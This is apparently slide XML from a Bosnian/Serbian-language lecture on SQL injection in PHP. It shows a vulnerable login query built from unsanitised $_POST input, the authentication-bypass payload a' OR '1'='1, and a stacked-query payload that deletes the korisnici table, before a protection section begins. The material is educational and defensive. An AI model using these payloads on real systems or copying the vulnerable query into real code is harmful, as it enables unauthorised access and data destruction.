              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>izvršio</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>tako</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> da </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>uvijek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>dohvata</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>podatke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>nekom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>korisniku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Sledeći</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>primjer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>demonstrira</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>propust</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>prilikom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>provjere</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>korisničkih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>podataka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" b="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54114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3843A-F0CB-4F68-AA95-F8451BE60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Provjera</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>korisničkih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>podataka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73C4E-49A2-46E6-A7C2-40312EB9B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3D683B-22CA-41C9-9B0E-E58673185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0"/>
            <a:ext cx="8915399" cy="4800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php</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR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podaci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sa login forme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username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$_POST['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username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'];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password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$_POST['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password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'];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provjera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podataka</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR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"SELECT * FROM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korisnici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WHERE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username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		     ='$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username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' AND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password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'$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password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'";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result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mysql_query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mysql_num_rows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result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 &gt; 0) {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//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korisnik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je </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-F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ulogovan</a:t>
            </a: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>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-F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29873034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2FB46-79B9-4B3C-B13E-452E787AE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Provjera</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>korisničkih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>podataka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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F2840-9B86-4137-8B3D-55A7C0D46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219200"/>
            <a:ext cx="7194550" cy="49228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Ukoliko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> bi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>napadač</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> u </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>ovakav</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> login </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>formular</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>umjesto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>korisničkog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>imena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lozinke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>unio</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>sledeću</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>vrijednost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>:</a:t>
            </a:r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sz="1100" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>upit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bi se </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>izvršio</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>izgledao</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> bi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>ovako</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3200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Ovakav</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>upit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> bi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>sigurno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>vratio</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>podatke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>nekom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>korisniku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> u </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>ovom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>konkretnom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>primjeru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>omogućio</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> bi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>korisniku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> da </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>bude</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>ulogovan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Dodavanjem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>još</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>nekih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>uslova</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>na</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> primer WHERE id = ‘1’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>ili</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>nekog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>drugog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> ID-a, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>postoji</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>velika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>vjerovatnoća</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> da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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>autorizovan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>kao</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> administrator </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>sistema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endParaRPr lang="en-GB" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" b="0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1C6BDD-96F1-483F-B81C-9E25E24D8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981200"/>
            <a:ext cx="88392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fr-F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a' OR '1' = '1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D83B27-1CAD-46C6-B3E4-2B8F96401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971800"/>
            <a:ext cx="8839200" cy="90090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SELECT * FROM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korisnici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WHERE username = 'a' OR '1'='1' AND </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="60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password = 'a' OR '1'='1'</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21882573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CB80E-D67C-4019-9C80-4B4B0E67A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Provjera</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>korisničkih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>podataka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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30FA7-5053-493E-BCBE-BE129BEF3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219200"/>
            <a:ext cx="7194550" cy="49228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Osim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>kod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>provjere</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>autentifikacije</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>može</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> se </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>iskoristiti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u </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>druge</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>zlonamjerne</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>svrhe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>, a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>jedan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> od </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>njih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> je </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>ubacivanje</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>dodatnog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>upita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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>može</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>uništiti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>podatke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>ili</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>neke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>druge</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>zlonamjerne</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>akcije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Sledeći</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>primjer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>demonstrira</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> SQL injection u </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>cilju</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>izvršenja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>dodatnog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>upita</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>:</a:t>
            </a:r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Izvšenje</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>više</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>upita</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>odjednom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>nije</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>podržano</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> u </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>mysqli_query</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>funkciji</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>ali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>drugi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>drajveri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>npr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>. za PostgreSQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>ili</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> SQLite, to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>dozvoljavaju</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>, pa </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>tako</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>izvšenje</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>ovakvog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>koda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>predstavlja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>ozbiljan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>sigurnosni</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>propust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endParaRPr lang="en-GB" b="0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B3901A-42FA-476F-99EB-3E2D9A0DA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387436"/>
            <a:ext cx="8839200" cy="11083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ubacivanje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dodatnog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upita</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB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$name = "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Pera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'; DELETE FROM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korisnici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”;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buNone/>
            </a:pP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mysql_query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("SELECT * FROM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korisnici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WHERE name='$name'");</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41088802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CE493-30FD-4AC9-9CFC-868751578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Zaštita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7F672-0E4C-4DF8-BD87-76B3C25F2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219200"/>
            <a:ext cx="7194550" cy="49228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/>
              <a:t>Kao </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>što</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> je </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>već</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>spomenuto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>filtriranje</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>inputa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>može</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>spriječiti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
